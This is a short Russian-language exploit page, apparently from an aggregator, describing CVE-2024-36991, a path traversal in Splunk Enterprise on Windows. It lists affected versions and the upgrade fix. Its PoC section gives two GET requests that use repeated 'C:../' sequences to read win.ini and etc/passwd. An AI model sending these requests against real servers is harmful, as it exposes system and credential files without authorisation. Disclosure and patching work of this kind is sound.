## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MR-XN-CVE-2024-36991
# CVE-2024-36991
> Обход пути в конечной точке «/Modules/Messaging/» в Splunk Enterprise на Windows
В Splunk Enterprise версиях ниже 9.2.2, 9.1.5 и 9.0.10 злоумышленник может выполнить обход пути в конечной точке /modules/messaging/ в Splunk Enterprise на Windows.
Уязвимость существует из-за того, что функция Python os.path.join удаляет букву диска из элементов пути, если диск в элементе совпадает с диском в создаваемом пути.
Эта уязвимость должна затрагивать только Splunk Enterprise на Windows.
# POC
root@kitploit:~
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini
GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd
# Затронутые версии
* затронуты версии от 9.2 до 9.2.2
* затронуты версии от 9.1 до 9.1.5
* затронуты версии от 9.0 до 9.0.10
# Решение
Обновите Splunk Enterprise до версий 9.2.2, 9.1.5 и 9.0.10 или выше.
# Авторы
Danylo Dmytriiev (DDV_UA)
# Ссылки